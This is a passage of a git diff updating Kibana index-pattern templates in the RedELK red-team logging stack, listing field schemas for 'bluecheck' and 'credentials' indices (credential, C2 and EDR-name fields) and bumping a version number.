word\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.log_file\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"path\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"path\"}}},{\"name\":\"pstools.psx.edr_name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.edr_name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.edr_name\"}}},{\"name\":\"pstools.psx.security_products\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.security_products.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.security_products\"}}},{\"name\":\"pstools.tool\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.tool.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.tool\"}}},{\"name\":\"results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"results\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}},{\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"type\"}}}]", "timeFieldName": "@timestamp", "title": "bluecheck-*"}, "coreMigrationVersion": "7.16.2", "id": "bluecheck", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152837408, 1663], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson index 4959e210..35dc0ff9 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171858664, 19], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword